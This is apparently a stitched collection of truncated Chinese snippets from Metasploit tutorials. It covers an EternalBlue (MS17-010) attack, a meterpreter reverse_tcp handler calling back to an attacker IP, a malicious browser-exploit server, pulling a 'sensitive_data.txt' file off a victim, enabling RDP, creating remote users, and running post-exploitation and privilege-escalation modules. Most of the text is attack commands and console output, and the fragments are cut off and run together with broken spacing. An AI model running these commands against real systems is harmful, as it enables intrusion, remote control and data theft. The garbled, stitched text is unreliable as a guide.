1、查找 CVE 公布的漏洞 2、查找对应的 exploit 模块 3、配置模块参数 4、添加 payload后门 5、执行 exploit 开始攻击 创建新用户来远程连接win10桌面: RDP概述:远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称"本地电脑")连上提供微软终端机服务的电脑(服务器...
bash复制代码use exploit/multi/handler 【使用监听模块】set payload windows/x64/meterpreter_reverse_tcp 【设置的payload必须和msfvenom当中生的payload是同一个模块】set lhost 192.168.10.132【因为使用的是reverse模板,这里设置攻击机的ip,用于监听shell连接】set lport 4444【因为使用的是reverse模板,这里设置攻击机...
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.10 set LHOST 192.168.1.20 set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit 1. 2. 3. 4. 5. 进入Meterpreter 会话并执行命令: sysinfo ls download C:\\Users\\Admin\\Desktop\\sensitive_data.txt /tmp/sensitive_data.txt ex...
SMBUser no (Optional) The username to authenticateasVERIFY_ARCHtrueyes Checkifremote architecture matches exploit Target. VERIFY_TARGETtrueyes Checkifremote OS matches exploit Target. Payload information: Space:2000Description: This moduleisa port of the Equation Group ETERNALBLUE exploit, part of the ...
可先利用enum_patches模块收集补丁信息,然后查找可用的exploits进行提权,需要退出当前连接 代码语言:javascript 代码运行次数:0 运行 AI代码解释 meterpreter>run post/windows/gather/enum_patches #查看补丁信息 msf>use exploit/windows/...#利用未打补丁的模块即可 msf>setSESSION5msf>exploit 7.远程桌面&截图...
对于exploit模块,Metasploit根据模块使用容易程度和对目标系统的潜在影响程度,对模块进行了分级。 1951windows/tftp/threectftpsvc_long_mode2006-11-27great No 3CTftpSvc TFTP Long Mode Buffer Overflow1952windows/unicenter/cam_log_security2005-08-22great Yes CA CAM log_security() Stack Buffer Overflow (Win...
[*] Exploit completed, but no session was created. msf6 exploit(windows/browser/firefox_smil_uaf) > [*] Started reverse TCP handler on 192.168.91.128:4444 [*] Using URL: http://192.168.91.128/ [*] Server started. 现在已经设置好一切,我们需要受害者浏览我们的网站——这可以通过多种方式实现...
msf6 exploit(windows/smb/psexec) > use post/windows/manage/enable_rdp msf6 post(windows/manage/enable_rdp) > show options msf6 post(windows/manage/enable_rdp) > set SESSION 4 SESSION => 4 msf6 post(windows/manage/enable_rdp) > exploit [*] Enabling Remote Desktop [*] RDP is already ...
使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 使用info查看模块信息: info 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp 查看模块需要配置的参数:show options 设置参数:set RHOST 192.168.125.138 攻击:exploit / run ...
→ Qftm:~/Desktop# 常用的信息收集脚本 run post/windows/gather/arp_scanner 参数#查看内网主机run post/windows/gather/checkvm#是否虚拟机run post/linux/gather/checkvm#是否虚拟机run post/windows/gather/forensics/enum_drives#查看分区run post/windows/gather/enum_applications#获取安装软件信息run post/wind...